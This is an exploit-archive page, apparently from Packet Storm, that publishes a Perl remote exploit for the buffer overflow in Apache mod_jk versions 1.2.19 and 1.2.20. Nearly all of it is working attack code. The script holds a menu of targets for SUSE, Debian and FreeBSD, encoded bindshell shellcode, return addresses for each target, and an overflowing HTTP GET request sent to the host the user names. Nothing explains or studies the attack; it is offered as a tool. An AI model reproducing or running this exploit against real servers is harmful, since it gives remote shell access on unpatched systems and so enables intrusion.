what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

apachemodjk-overflow.txt

apachemodjk-overflow.txt
Posted Jul 10, 2007
Authored by eliteboy

Apache mod_jk versions 1.2.19 and 1.2.20 remote buffer overflow exploit that binds a shell to TCP port 5555. Written for SUSE Enterprise Linux and FreeBSD.

tags | exploit, remote, overflow, shell, tcp
systems | linux, freebsd, suse
SHA-256 | 4343e34adf3fa71ca9c9be78dc3cb878faf1fd6762925f141c3657a3379e0462

apachemodjk-overflow.txt

Change Mirror Download
# Apache w/ mod_jk Remote Exploit
# by eliteboy

use IO::Socket;

print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n";

$target = $ARGV[1];
if (($#ARGV != 1) || ($target < 1) || ($target > 3)) {
print "Usage: modjkx.pl <hostname> <targettype>\n";
print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n"
."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n"
."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n";
exit;
}

$port = 80;

### lnx metasploit bindshell code port 2007
my $lnx_shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49".
"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b".
"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51".
"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30".
"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b".
"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b".
"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b".
"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33".
"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37".
"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46".
"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42".
"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48".
"\x61\x68\x4d\x6d\x50\x49";

### bsd metasploit bindshell code port 5555
my $bsd_shellcode =
"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff".
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49".
"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52".
"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76".
"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36".
"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f".
"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f".
"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58".
"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41".
"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77".
"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62".
"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52".
"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42".
"A" x 100;

$alignment = 4127;

$|=1;

if ($target eq 1) {
$shellcode = $lnx_shellcode;
$addr = 0xbffff060;
}

if ($target eq 2) {
$shellcode = $lnx_shellcode;
$addr = 0xbfffef4c;
}

if ($target eq 3) {
$shellcode = $bsd_shellcode;
$addr = 0xbfbfe5d5;
}

$offset = pack('l', $addr);

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $port,
Proto => 'tcp');

$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset;

print $sock "GET /$a HTTP/1.0\r\n\r\n";

while(<$sock>) {
print;
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close